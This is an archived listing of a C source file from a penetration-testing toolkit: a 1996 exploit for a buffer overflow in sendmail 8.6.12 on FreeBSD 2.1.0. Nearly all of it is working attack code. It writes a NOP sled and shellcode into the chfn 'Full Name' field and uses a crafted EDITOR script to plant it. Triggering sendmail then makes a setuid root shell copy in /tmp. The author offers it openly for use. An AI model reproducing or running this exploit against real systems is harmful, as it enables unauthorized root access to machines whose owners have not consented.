home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / freebsdmail.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  2KB  |  66 lines

---

1. /*                               Hi !                                       */
2. /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */
3. /* If you have any problems with it, send letter to me.                     */
4. /*                             Have fun !                             
5. /* -----------------   Dedicated to my beautiful lady   ------------------  */
6. /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su           
7.  
8. #include <stdio.h>
9. main()
10. {
11.   void make_files();
12.   make_files();
13.   system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;
14.          echo See result in /tmp");
15. }
16.  
17. void make_files()
18. {
19.   int i,j;
20.   FILE *f;
21.   char nop_string[200];
22.   char code_string[]=
23.     {
24.       "\xeb\x50"                         /* jmp    cont */
25.       /* geteip: */
26.       "\x5d"                             /* popl   %ebp */
27.       "\x55"                             /* pushl  %ebp */
28.       "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc3(%ebp) */
29.       "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd7(%ebp) */
30.       "\xc3"                             /* ret */
31.       /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
32.       /* 0xffffffc3(%ebp): */ "\x3c"
33.       "chmod a=rsx /tmp/sh"              /* 0xffffffd7(%ebp): */
34.       "\x01"
35.       "-leshka-leshka-leshka-leshka-"    /* reserved */
36.       /* cont:  */
37.       "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf70,%esp */
38.       "\xe8\xa5\xff\xff\xff"             /* call   geteip */
39.       "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xb4ffffff,%ebp */
40.       "\x55"                             /* pushl  %ebp */
41.       "\x55"                             /* pushl  %ebp */
42.       "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0 */
43.       "\xc3"                             /* ret */
44.       "-leshka-leshka-leshka-leshka-"    /* reserved */
45.       "\xa0\xcf\xbf\xef"
46.     };
47.  
48.   j=269-sizeof(code_string);
49.   for(i=0;i<j;nop_string[i++]='\x90');
50.   nop_string[j]='\0';
51.  
52.   f=fopen("user.inf","w");
53.   fprintf(f,"#Changing user database information for leshka\n");
54.   fprintf(f,"Shell: /usr/local/bin/bash\n");
55.   fprintf(f,"Location: \n");
56.   fprintf(f,"Office Phone: \n");
57.   fprintf(f,"Home Phone: \n");
58.   fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
59.   fclose(f);
60.  
61.   f=fopen("hack","w");
62.   fprintf(f,"cat user.inf>\"$1\"\n");
63.   fprintf(f,"touch -t 2510711313 \"$1\"\n");
64.   fclose(f);
65. }
66. /*                    www.hack.co.za              [2000]*/